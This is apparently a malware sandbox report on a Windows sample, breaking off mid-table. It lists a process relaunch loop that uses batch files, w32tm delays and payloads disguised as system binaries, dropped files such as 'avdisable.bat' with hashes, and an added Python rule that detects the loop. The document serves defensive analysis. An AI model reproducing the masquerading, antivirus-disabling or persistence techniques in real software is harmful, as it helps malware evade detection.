C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\53OVnhiNRT.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wNwF62sylT.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\T3kbcxG26A.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\0quqFCQQe7.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ssDSZpddA3.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\4stVUxPy0P.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\E3sOpJujjE.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SzaURWjxsM.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\GTS4B5cy6p.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\p5ITN63wlJ.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wKGJ2NUoAL.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8KwMxVG80h.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\OI2OM6vZgr.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\j8BV8simza.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\Idle.exe
"C:\Users\Default User\Idle.exe"
C:\Users\Default User\sppsvc.exe
"C:\Users\Default User\sppsvc.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\z7AIE64VZ5.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe
"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
C:\Users\Default User\sppsvc.exe
"C:\Users\Default User\sppsvc.exe"
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ounU5LkXKE.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\5mXdMdden9.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\x8TIUMdSeB.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SzaURWjxsM.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\NHYDEKme3A.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\WLCDTNV5Zk.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\410ZzJtAuR.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DC0SKfNvdG.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\T3kbcxG26A.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yaFjl1awzE.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\5irhJyFUC1.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\HiXkD60p2N.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\95TPLp0dsP.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LBVLNHYHv1.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DXR1U0Y5m3.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\System.exe
"C:\Users\Default User\System.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ST975DOJvB.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
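The process list above records the sample's relaunch loop: each payload copy (dllhost.exe under C:\Recovery\, later sppsvc.exe, Idle.exe and System.exe under C:\Users\Default User\) runs cmd.exe on a ten-character .bat in the user's Temp directory, the batch file calls w32tm /stripchart against localhost as a stand-in for a sleep (with /period:5 /samples:2 it blocks for roughly five seconds), and then starts the next copy under a system-binary name from a path where no system binary lives. The detection below is an added example for this page and is not code from the sandbox report or from the sample. It correlates process-creation records in a Sysmon-like shape; the records are constructed to mirror the list above, with invented pids and three benign rows added. The system-only name list, the assumption that the batch names are always ten alphanumerics, and the treatment of Idle.exe and System.exe as names that never exist on disk are my own assumptions.

```python
"""Added example: flag the batch-relaunch loop seen in the process list.
Not part of the sandbox report. Records are constructed; pids are invented."""
import re
from collections import defaultdict
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (Sysmon EID 1 / Security 4688 style)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# cmd.exe /C "<drive>:\Users\<user>\AppData\Local\Temp\<10 alphanumerics>.bat"
# Every .bat in the list above has a ten-character name (assumption: always ten).
TEMP_BAT_RE = re.compile(
    r'/C\s+"?[A-Za-z]:\\Users\\[^\\]+\\AppData\\Local\\Temp\\[A-Za-z0-9]{10}\.bat"?',
    re.IGNORECASE,
)
# w32tm /stripchart against localhost: a time probe used here purely as a delay
# of about period x (samples - 1) seconds.
STRIPCHART_RE = re.compile(r"/stripchart\s+/computer:localhost", re.IGNORECASE)

SYSTEM_DIRS = ("c:\\windows\\system32", "c:\\windows\\syswow64")
# Binaries that ship only in a Windows system directory (assumption; extend per estate).
SYSTEM_ONLY_NAMES = {"dllhost.exe", "sppsvc.exe"}
# Names mimicking kernel pseudo-processes, which have no on-disk executable at all.
PSEUDO_PROCESS_NAMES = {"idle.exe", "system.exe"}


def _name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def _dir(path: str) -> str:
    return str(PureWindowsPath(path).parent).lower()


def is_temp_bat_launch(ev: ProcEvent) -> bool:
    return _name(ev.image) == "cmd.exe" and bool(TEMP_BAT_RE.search(ev.cmdline))


def is_w32tm_sleep(ev: ProcEvent) -> bool:
    return _name(ev.image) == "w32tm.exe" and bool(STRIPCHART_RE.search(ev.cmdline))


def is_masquerade(ev: ProcEvent) -> bool:
    """System-binary name outside System32/SysWOW64, or a pseudo-process name on disk."""
    name = _name(ev.image)
    if name in PSEUDO_PROCESS_NAMES:
        return True
    return name in SYSTEM_ONLY_NAMES and not _dir(ev.image).startswith(SYSTEM_DIRS)


def find_relaunch_loops(events):
    """Return (cmd_pid, relaunched_image) for each cmd.exe that ran a Temp .bat
    and spawned both the w32tm delay and a masquerading child."""
    children = defaultdict(list)
    for ev in events:
        children[ev.ppid].append(ev)
    hits = []
    for ev in events:
        if not is_temp_bat_launch(ev):
            continue
        kids = children[ev.pid]
        if any(is_w32tm_sleep(k) for k in kids):
            hits.extend((ev.pid, k.image) for k in kids if is_masquerade(k))
    return hits


# Constructed records mirroring the list above; the last three rows are benign
# noise (a real w32tm query, a real dllhost.exe) that the rule must not flag.
PAYLOAD = r"C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe"
W32TM_SLEEP = r"w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2"
SAMPLE_EVENTS = [
    ProcEvent(1000, 1, PAYLOAD, f'"{PAYLOAD}"'),
    ProcEvent(1001, 1000, r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\aJcBxrOCPY.bat"'),
    ProcEvent(1002, 1001, r"C:\Windows\system32\w32tm.exe", W32TM_SLEEP),
    ProcEvent(1003, 1001, PAYLOAD, f'"{PAYLOAD}"'),
    ProcEvent(1004, 1003, r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\z7AIE64VZ5.bat"'),
    ProcEvent(1005, 1004, r"C:\Windows\system32\w32tm.exe", W32TM_SLEEP),
    ProcEvent(1006, 1004, r"C:\Users\Default User\sppsvc.exe", r'"C:\Users\Default User\sppsvc.exe"'),
    ProcEvent(2000, 1, r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Documents\sync.bat"'),
    ProcEvent(2001, 2000, r"C:\Windows\system32\w32tm.exe", r"w32tm /query /status"),
    ProcEvent(2002, 2000, r"C:\Windows\System32\dllhost.exe", r'"C:\Windows\System32\dllhost.exe"'),
]

if __name__ == "__main__":
    for cmd_pid, image in find_relaunch_loops(SAMPLE_EVENTS):
        print(f"relaunch loop via cmd.exe pid {cmd_pid}: {image}")
```

Run the file directly to print the two hits from the constructed records. The rule fires only on the combination (Temp batch, stripchart delay, masquerading sibling), which is what keeps a lone legitimate w32tm query or a real dllhost.exe from alerting; in production, feed it the full process-creation stream and add any other system-only names your estate cares about.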
Network
Files
memory/2444-0-0x000007FEF5723000-0x000007FEF5724000-memory.dmp
memory/2444-1-0x0000000000820000-0x0000000000A0C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
| MD5 | 4eab8d478ffd36a7d96ca9a8512cc447 |
| SHA1 | cddb1b2d3656d62cdcc67125ec29f2bf83c5f346 |
| SHA256 | a2701733d9e6d3b518072810c779b25dd7ddd683fe36196e259a551acbc1e16a |
| SHA512 | c5dec11ecb61486b87d26f34e90e1107562186ed16c7d9b77d2e7b47456917f2aafc2c61b6b78472a8eeaa84a93a52192c300cf79220bbe8bcc9c080db1e36d6 |
C:\Users\Admin\AppData\Local\Temp\clear_av.bat
| MD5 | 48d1db006fe2ae378b0f7efd561d7e56 |
| SHA1 | 63df10216f0ad81d1d42dd2fc8c4483be5d077fc |
| SHA256 | 65428112138dff324acd39babd902959dbb78b6ed74a276a1d3c9993ae52847a |
| SHA512 | 079fa75df35b8fea18fb220b3f005d6384b28aedb2e5ae62ddd3f6db6abda7dbab091fd44d05dffb4ec41657e052f379267eef7c5126fd8bd7eb189f147806f5 |
C:\Users\Admin\AppData\Local\Temp\FunChecker .bat
| MD5 | 42afdea7c75bc9074a22ff1be2787959 |
| SHA1 | 24bc20691a1e99e2cf0b2bca78694701fa47720a |
| SHA256 | 3d005de7ab5cd8684deeb07dd7e280659384bc574ebe2293b470e29a092ecbc2 |
| SHA512 | d30c5a89fa98534dc53f0e686db7a4eae66c891a4c06f585fcb35f3dcbad372365f175d2b7fa878875812dd9da097181784a35f8f615e8c05668d64a13863bb9 |
C:\Users\Admin\AppData\Local\Temp\avdisable.bat
| MD5 | 4c35b71d2d89c8e8eb773854085c56ea |
| SHA1 | ede16731e61348432c85ef13df4beb2be8096d9b |
| SHA256 | 3efeeaaabfd33ff95934bee4d6d84e4ecb158d1e7777f6eecd26b2746991ed42 |
| SHA512 | a6ccbb2913738ca171686a2dd70e96330b0972dadb64f7294ac2b4c9bb430c872ed2bcd360f778962162b9e3be305836fa7f6762b46310c0ad4d6ef0c1cdac8d |
memory/2444-35-0x000007FEF5720000-0x000007FEF610C000-memory.dmp
C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe
| MD5 | 9a1c593488c39a17105a4ea268b40a0e |
| SHA1 | 90f73ef3dd6c79442f27f481957e60f0deaa3ab4 |
| SHA256 | 9158f324d6e13bef490aa65d1a88faf7a86ea8f5672a169a1bebcbe6b84bf7b5 |
| SHA512 | a955caffe8bd4b697afadaf18f7bb34fe17c1fc7555708a0bff792c301c9b40ebdc680b0e8c50219ea37b23cf3b154f041ec57c549979d3b8f9546b269cdd67d |
C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat
| MD5 | 773bdbbe3e641a349d737adddf1223c0 |
| SHA1 | 682e313b914460eefe3e2cb7a09beeacd461c108 |
| SHA256 | 606a9b2fe5108baa4a87284abaa58179f02cb4df332e81bf866351b66a04643a |
| SHA512 | 0f2a2ac17804b254d91dee3ebba42df3630ffef674ec72102310ed76c9adaa874abb02d7a674183838da8951428a2d8504f6717279fd725be6002565017154a4 |
\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe
| MD5 | 1876c5d2f6209c7ca5db2b568ec8dc47 |
| SHA1 | 6bc2ed6ef3bfff6ac95ddeba230634520ea4fe33 |
| SHA256 | e580bbab6157f88c10d75fdbf17ac4d971e60d6e81982da6e78dfb28af58a755 |
| SHA512 | b2f2a38154cbf531ab5e47c6e310ca2de4a5365055115af2ee5e08a3d2ac1c21db6b964f0b36c69ffe0164b7dafb2552a9bc6ac6a2846247f58564c9a834cf94 |
memory/1808-49-0x0000000000A40000-0x0000000000C64000-memory.dmp
memory/1808-50-0x0000000000560000-0x000000000057C000-memory.dmp
memory/1808-51-0x0000000002200000-0x0000000002216000-memory.dmp
memory/1808-52-0x000000001B000000-0x000000001B056000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CbarT2SBYT.bat
| MD5 | fd4af78910480b801198143e034c7a70 |
| SHA1 | 36ae3ca66727a9c89c89e15710de374fef842018 |
| SHA256 | 821abecbcedf393c871323128bba199ef2e3fe458ef67d92a39f3daace4811e8 |
| SHA512 | c5e567f4cd0f0bb15aa516ce83f195887a363e4b36c454b72f0a5489f7cc54fc763defac520d58a436e2bac0ec839d70d5397e4dca25a1cd077d61adca5efc04 |
memory/2448-78-0x0000000000F70000-0x0000000001194000-memory.dmp
memory/2448-79-0x0000000000B20000-0x0000000000B76000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\syYKg8QxNI.bat
| MD5 | 28cea2d0146d39f77b4fd4c4ca8a1332 |
| SHA1 | 08abdb63ca72466901c22dff844eb540746e09ac |
| SHA256 | 9cec9c990144fc6e8384d7e108528e8f282f7351ee3c059507536d95cdb75a72 |
| SHA512 | 2f4a6e94f53d396619385059dd0fdb82dec842960dc21c2688eb919dbf0038e662ff45c1562f125faba7dbdcfcc3c08208f50fce5f2339287cf059455973e0cc |
C:\Users\Admin\AppData\Local\Temp\SaOkt9ru2m.bat
| MD5 | df4773f9129b9cf115be5e01cc974dcd |
| SHA1 | ac33c525d0fced17956293d912ba0e7a8864f689 |
| SHA256 | 127da4bddb1c1fa4c0cd3d6c3a525d86e5a629d37f5a5ac71c8f6ac4c974bb49 |
| SHA512 | e50add9bc5cf8337d7fc98ba955ae96f5f7d9dc7a41e1d2122b005ec662082328d3ef26280998bdaeead76f5152ae4a7291cd686330961bde925ca91d2354986 |
memory/2580-92-0x00000000011E0000-0x0000000001404000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\8RIE4o2SCx.bat
| MD5 | 2201eaea2de2c24a9a57fb6907bc1053 |
| SHA1 | a89b5b52e86ead88113d601157190903e72354d5 |
| SHA256 | 8711488963ad1d6499a867f1cd8e596301e31c7b9a34898b9d10d7d758d1b3aa |
| SHA512 | 071a9ebd1ae7d2887679734b63ee9b26a8501c8db18b0b17ceb1a021010d519e6a5b536722b5b0ef404123d6331c94535d3a2db5f2b2c86f0e7e092560cc83d6 |
C:\Users\Admin\AppData\Local\Temp\QRlBHoY6P9.bat
| MD5 | af663d477ea3cb8e0ab6dec0a54c0468 |
| SHA1 | 79312354971800ba78c4c063592dbce4f10c9072 |
| SHA256 | fe24ea1192c85f6752b3ad9c6e928a4a4d6f4cc50f90d13d3e098d0bf7733740 |
| SHA512 | 5ba78d9b1ed3d6aeb3a316f76c4d28505b6c0077d48bfc2b3897af104bb934f55d04dc00d50593495ba3f9723572907e97425416c98966c4786dbe8404f80c8c |
C:\Users\Admin\AppData\Local\Temp\gPrDhQDX5J.bat
| MD5 | 19bc625e56cd331db53d51659096b3ac |
| SHA1 | 00ed66a0dc9dba96e53a354fc7f6a80d3bd0ad79 |
| SHA256 | bbe6fdfc3e0e18e50d86165bc7d45c8dcaa69f912342d154bae1b5495ae94b72 |
| SHA512 | 552165d9ae700e5f2e20770cf2bd3d7f1a924e34317a5680378acca900edf7e7af1a4fae27b515878560c58dba23b7ec0a8430597ef85aa7ea804262ec8bf253 |
C:\Users\Admin\AppData\Local\Temp\1F0LTC0kP2.bat
| MD5 | 52e6ae137962ea562104d320d0c91864 |
| SHA1 | 4c4375c9950a1267859e0a47cb5ee707e873ce8e |
| SHA256 | 9017c3984a3a3a45506e1f7f461ef48b10064c830b54d44a91ff66e432713d20 |
| SHA512 | aa1c34beaca5efa92c88c3c93e5ea16bfc5737f4587b026c8c90afd2792ed0bfa970f5d8b7bb5b7e6a886bce26d0576e7ea7f588d7934b926a9025aba6cdbdab |
memory/1716-117-0x00000000012B0000-0x00000000014D4000-memory.dmp
memory/1716-118-0x00000000005C0000-0x0000000000616000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\fmTXnddwCX.bat
| MD5 | 02e98cbd8a083b6029f143d2431be1b4 |
| SHA1 | 7e936c463f53746a4930ec10ba3da45feef6118e |
| SHA256 | 0bf287dadfa1b29cb77df7cc6c3228c20863fa195bdd984f5f9f656f5416f67f |
| SHA512 | 62f0c86b4ef41c664736b5c2bd6d9fb868c3ae68d7688c40de3b2dee4c8f6d291361d8f13199b2347e524ac56bcdc1fd6e9c38a492f9c59dd0cf62c1293ecb3a |
memory/1608-125-0x0000000000370000-0x0000000000594000-memory.dmp
memory/1608-126-0x00000000020B0000-0x0000000002106000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\b7oBPqXqtO.bat
| MD5 | 2000ad2a4f5c23380024e9db6f9cef02 |
| SHA1 | 6924ec9921205d02f6824f208d373f505afae7b5 |
| SHA256 | 11aabb024a5673d908b5df9fc4b0100a75ad5e48605d118e6591c212ae86d347 |
| SHA512 | 5511cccb3cb73acfc59724975e92cde0a24c4a7c1f32399ff38c83330b92299d7e508d22de5581da5758f0f678d55d7115ab80d62d6692d4dee2aaaf754fcc8c |
memory/2232-133-0x0000000000950000-0x0000000000B74000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\aWJwCUxpp4.bat
| MD5 | af58a175f03d595f8276bd3441112d60 |
| SHA1 | 23403f89d09a083fb9710f5adbcbddfccab0d765 |
| SHA256 | c910b6a3e9a742b3e9f34851844079241f272b0b159eb9a9d7d982cc0e98bd67 |
| SHA512 | f92d36d25469fba588991be563eca8787ad65c5b5295f54e61543bb1ad9c98352d8eeaf4d06e2a951b4b998999227ae911f13a4680c8bcdd2c65eb6f37dd0078 |
memory/2008-140-0x0000000000EB0000-0x00000000010D4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\UucX7bnqC8.bat
| MD5 | 052f447696425a5548ceda755a697895 |
| SHA1 | d9ee05f9eded5410a770f60af8c686b96fe7e9e3 |
| SHA256 | 908b5afae7857a47a3b1082a809dfcf8f65dee7331c149979033607b7b5b986b |
| SHA512 | b5706aa5beb78f8b6a6de150c5bbda564340f727ae5415f10bec9ab39109846d80af47a3b318a012c516b1a3214763f6c1cf06d45f63818f8fff00274c61419b |
C:\Users\Admin\AppData\Local\Temp\FIx4sKIZfl.bat
| MD5 | 55118db681e1df3f90964879125c604b |
| SHA1 | 0035cc488e74a82b2644c4902aad1bd259322053 |
| SHA256 | d378426e7b25bbe9711a43e52ff3851d69d3ef3aa050a192371a6f02bfa55e5c |
| SHA512 | 0526694d8e2a2a45e7c3448ef94c36eb1eea258d672375b5b9dedf0e757cce54d0fba8399da7c177a9fc877a4427713542b2ed1bf58df1099a28d7db1987097c |
memory/2552-153-0x00000000011C0000-0x00000000013E4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\EYKlAcFNfO.bat
| MD5 | 7b265cbaeb1fb2e627f0566a5ae0e2f4 |
| SHA1 | c99fc749979fbe76f02a3ac6c8c2e68ab1c7406e |
| SHA256 | 426e8b7546f88e843f4909e4bee3a7fd32c0f552c66750473933bb6d796b80c5 |
| SHA512 | acbe25f8ffb3e5c752c8cb3fe1fee7f4425b93fdd0d200104e2caa3fedfa2ff14a7d32d852d54a8ccddf99e8cf01b5d5f0f462e9db914db02299073caeef6133 |
memory/2284-160-0x0000000000620000-0x0000000000676000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\KxKP0srito.bat
| MD5 | 860fa076d02e09eb8c3e41c9d4c5f8b0 |
| SHA1 | fd69ee8b387620fe03d373433e44d2518dc3e44e |
| SHA256 | 7b2de268908ac92cef856f3730879c22578eeef519d767f35a0178fc69d3476b |
| SHA512 | 2ce6aaedde803551e7fd04e22cfeea33fa49f90e2c7bb4187dcb48cbd181738537d88bb64cae4ab57302d559889230e1cde25706d06334130bff958e130ec0bf |
C:\Users\Admin\AppData\Local\Temp\L9j9zErPDE.bat
| MD5 | c08c5835d7da2ff7c5d71134559acf41 |
| SHA1 | 61c92a80277d8fc19de629056c4671670c79f714 |
| SHA256 | 57bf22a15124ed06f15748b987f144797027cdac28189277d7d28da4781f4b81 |
| SHA512 | bb0ebffed51f9e27e00db227963cde10a30e450b674b9caa3e31e5c3be4eaf9e647b98030a9bc526b3d6514a0b955d38dcfdcd827df9efb915e38b3a3240dd5e |
memory/2180-179-0x0000000000360000-0x0000000000584000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\eNTIt1NKYH.bat
| MD5 | a16dcae3d73bf4bb0ed63ec7f3d8e62c |
| SHA1 | 21cb72b7f6ba0c759fde60c6ceb189d27a13fd2d |
| SHA256 | 5f289db73a0bf5b750187dfdac5940110ec479bf91118ccf570bfd67a771a07b |
| SHA512 | 0279ae264743109364e26577bd6500e34ee26a4a3520f247acd9938664af3e88e1f122a4db360e27c71266b19d4e83ceb603a0d1b00fd6edb4cf6a9acd6bfc28 |
memory/3052-186-0x0000000000160000-0x0000000000384000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\sPXGbYzrvf.bat
| MD5 | 842cc854180a35de61342e8e70cdf72d |
| SHA1 | 91db87cb3df45f0d5a8798b9a8dcc2b8285a8907 |
| SHA256 | f304b85e651a23ec7d5c79b581dde09f7d9b2d6ccf44872e3c55b58556e3826b |
| SHA512 | d70552d78f4baeef002af98e484e8e563a9674c3c19b68dab43657d9278cff5bc76d10b27e02e2fb78df43834f79583e8daf80a04c330d315c67d0b06dacdb15 |
memory/880-193-0x0000000000AF0000-0x0000000000D14000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\0P1AeAAEDQ.bat
| MD5 | 63cbf982ccde2f294846f54e1c935181 |
